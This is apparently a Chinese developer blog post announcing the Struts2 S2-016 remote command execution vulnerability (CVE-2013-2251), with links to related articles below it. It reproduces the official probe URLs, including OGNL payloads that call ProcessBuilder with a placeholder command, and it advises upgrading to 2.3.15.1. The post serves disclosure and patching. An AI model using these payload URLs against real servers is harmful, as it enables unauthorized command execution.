Struts 2.0.0 - Struts 2.3.15漏洞来袭

最新推荐文章于 2024-09-30 15:47:20 发布
最新推荐文章于 2024-09-30 15:47:20 发布 · 147 阅读 · 0
文章标签:

#java

Struts2发布了一个影响2.0.0至2.3.15版本的安全漏洞CVE-2013-2251。该漏洞允许攻击者通过特定的HTTP请求执行任意命令。已知受影响的大站点包括淘宝、腾讯和网易等。官方建议升级到Struts2.3.15.1。

Struts官网又公布了一个涉及Struts 2.0.0 - Struts 2.3.15的漏洞,CVE-2013-2251,并给出了漏洞测试的方法:


简单表达式: - the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
命令执行:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}


详情页面:http://struts.apache.org/release/2.3.x/docs/s2-016.html

此漏洞一出,昨天(2013年7月17日)乌云漏洞平台上提交Struts2相关漏洞的数量剧增:


由于国内使用Struts2的网站太多,连一些大站也中招,比如淘宝、腾讯、网易等,官网给出的解决方案为:强烈建议升级到Struts 2.3.15.1!


iteye_10018
关注
struts2.0(一)
venus321的博客
03-11 3353
Struts2.0 action地址转化 配置Struts的核心过滤器 创建struts.xml 编写Action Struts流程 Struct常量配置 struts.xml模块化 Struts的Action类 Action访问ServletAPI Action直接访问Servlet API 使用ServletActionContext访问Servlet API Struts2.0的动...
[漏洞复现]Struts2-016命令执行漏洞复现
wwxxee
05-20 4628
Struts2-016命令执行漏洞 Struts2有很多漏洞,但是很多老系统都漏补了这个洞,成功率较高。 影响版本: 2.0.0 - 2.3.15 简述 Struts2的action:、redirect:和redirectAction:前缀参数在实现其功能的过程中使用了Ognl表达式,并将用户通过URL提交的内容拼接入Ognl表达式中,从而造成攻击者可以通过构造恶意URL来执行任意Java代码,进而可执行任意命令。redirect:和redirectAction:此两项前缀为Struts默认开启功能。 在s
Struts2高危漏洞2.3.15.3
03-15
Struts2高危漏洞造成大规模的信息泄露,因此需对Struts2相关jar包升级。以下是将struts2相关包由低版本升级至2.3.15.3的步骤。
开源框架 Apache Struts 2漏洞的 PoC 已公开
smellycat000的专栏
08-17 514
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队上周五,GitHub平台上出现了两个Apache Struts 2漏洞的PoC,可导致远程代码执行和拒绝服务攻击。美国网...
Struts2.0配置方法
ucgidtf的专栏
07-14 676
.搭建开发和运行环境。1.下载struts2.0所需jar包。下载地址:http://people.apache.org/builds/struts/2.0.0/struts-2.0.0-SNAPSHOT-all.zip2.确定开发工具为Eclipse3.2.1+MyEclip
struts2-core-2.3.15.1遇到两个漏洞升级最新版【Struts 2.5.26】
JEFFYU328的专栏
04-20 1629
一、背景 一个老网站Struts2版本struts2-core-2.3.15.1,遇到两个漏洞。 ①被查到存在编号【Struts2 S2-045 远程命令执行漏洞,CVE编号CVE-2017-5638】;受影响版本:【Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.1】。 ②升级版本过程中查询到存在另一个漏洞。计划升级到相近版本2.3.37。但在查询网上帮助时,发现有另一个漏洞;【Struts2 S2-061 远程代码执行漏洞(CVE-202.
Struts2漏洞检查工具2019版 V2.3.exe
01-16
S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大 S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 ...
Struts2系列漏洞利用工具-Struts2-Scan(二),附下载链接。
最新发布
白帽子黑客SuperherRo
09-30 646
Struts2漏洞扫描利用工具。
Struts2.rar
07-19
S2-016 CVE-2013-2251 Struts 2.0.0-2.3.15 http://struts.apache.org/release/2.3.x/docs/s2-016.html 影响范围非常大 S2-013 CVE-2013-1966 Struts 2.0.0-2.3.14 ...
struts2升级到Struts 2.3.15.1的步骤(最新安全版本)
weilikk的博客
08-27 933
       最近struts安全问题影响很大啊,iteye上面也有新闻:Apache Struts团队6月底发布了Struts 2.3.15版本,由于该版本被发现存在重要的安全漏洞,因此该团队今天发布了Struts 2.3.15.1安全更新版本。  新闻地址:http://www.iteye.com/news/28053          因此我升级了下当前项目的struts版本,原来...
Struts2漏洞修复到2.3.15.1版本步骤
热门推荐
spyjava的专栏
10-31 1万+
近日在CSND头条中爆出Struts2高危漏洞造成大规模的信息泄露的消息,让我们这些从事javaweb软件开发,并且应用struts2的人惊出一身冷汗。Struts漏洞影响巨大,受影响站点以电商、银行、门户、政府居多。而且一些自动化、傻瓜化的利用工具开始出现,填入地址可直接执行服务器命令,读取数据甚至直接关机等操作... 我们的很多项目都是基于Struts2的,这也让我们必须对此做出及时正确
Struts2的简单使用
dianbiao2276的博客
02-05 386
一、准备工作及实例 1.解压struts-2.1.6-all.zip apps目录:struts2自带的例子程序 docs目录:官方文档。 lib 目录:存放所有jar文件。 Src 目录:源文件存放地 2.六个基本包 struts2-core-2.1.6.jar :开发的核心类库 freemarker-2.3.13.jar :struts2的UI标签的模板使用free...
Apache Struts2远程代码执行漏洞(CVE-2021-31805)安全通告
weixin_44254243的博客
04-15 6619
1. 事件描述 监测发现,开源应用框架Apache Struts存在远程代码执行漏洞(CVE-2021-31805),攻击者可构造恶意的OGNL表达式触发漏洞,实现远程代码执行。受影响版本为Apache Struts 2.0.0~2.5.29。目前,该漏洞已在Apache Struts 2.5.30版本中修复。 事件类型:漏洞利用 事件等级:高危 2. 影响范围 远程代码执行漏洞影响范围: 2.0.0<=Apache Struts <= 2.5.29 不受影响版本 Apache Struts
struts2漏洞攻击一例
sam.ds.chen
07-20 322
怎样利用Struts2漏洞(2.0.0&lt;=version&lt;=2.3.15)搞垮一个基于Struts2写的网站?Strutsjava web frameworks里面的鼻祖了,现在大量的web apps里面,从政府网站到金融系统,都有她的影子(大量的系统都是采用一种被用烂了的SSH(Struts+Spring+Hibernate)组合来做的)。甚至阿里/淘宝也有一些系统使用了St...
关于 Apache Struts 2 存在远程代码执行漏 洞的安全公告
weixin_48421613的博客
04-13 3722
2022 年 4 月 12 日,Apache 官方公布 S2-062 远程代码执 行漏洞安全公告,漏洞编号为 CVE-2021-31805。 一、漏洞描述 Apache Struts 是一个免费的开源 MVC 框架,用于创建 优雅的现代 Java Web 应用程序。它支持约定优于配置,可使 用插件架构进行扩展,并附带支持 REST、AJAX 和 JSON 的插 件。 由于对 CVE-2020-17530(S2-061)的修复不完整,导致输 入验证不正确。如果开发人员使用 %{…}语法应用强制 OGNL 解析
Apache Struts2更新到新版本(2.5.22)
Slience
12-25 9609
前两天接到阿里云那边的一个远程命令执行漏洞(S2-046)和(S2-45)的通知,上面说建议更新Struts2框架到最新版。老项目没有用pom.xml管理jar包的,所以只好把Struts2的相关东西都给更新一下咯,在Struts2官网上查到目前最新(2019年12月)的是2.5.22,我先把官网上的示例下载下来,看看里面的jar包 解压后在lib文件夹下的东西看了一下,挑选了一下就直接替换掉原...
传统框架struts:S2-045漏洞如何彻底解决(struts2.3.15升级到2.3.32
follow大师兄的博客
06-25 1299
S2-045:Struts 2远程执行代码漏洞 漏洞描述:Apache Struts 2是世界上最流行的Java Web服务器框架之一。然而在Struts 2上发现存在高危安全漏洞(CVE-2017-5638,S02-45),该漏洞影响到:Struts 2.3.5 - Struts 2.3.31,Struts 2.5 - Struts 2.5.10漏洞影响:基于Jakarta Multipart解析器执行文件上传时可能的RCE影响版本:Struts 2.3.5 - Struts 2.3.31Struts
早上收到这样一份通知,求一无漏洞框架,无力吐槽
weixin_34309543的博客
11-02 245
关于停止使用Apache Struts2开发框架的通知 各有关单位: Apache Struts2(以下简称“S2”)是一种开源的、基于MVC架构的Java Web应用开发框架。S2自从2007年面世以来被国内外广泛使用,但也因屡次被披露存在高风险漏洞而闻名。采用S2的信息系统(网站)已成为境内外黑客重点攻击对象,因未及时修补漏洞而被攻击的安全事...
Mina 2.0.0-M1源码下载 - 早期开发者的资源宝库
### mina-2.0.0-M1.zip 知识点详解 #### 1. 文件标题解读 标题中的“mina-2.0.0-M1.zip”表示这是一个名为mina的软件开发包的压缩文件版本号为2.0.0-M1。这里的“M1”通常指的是第一版的里程碑(Milestone)版本,...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值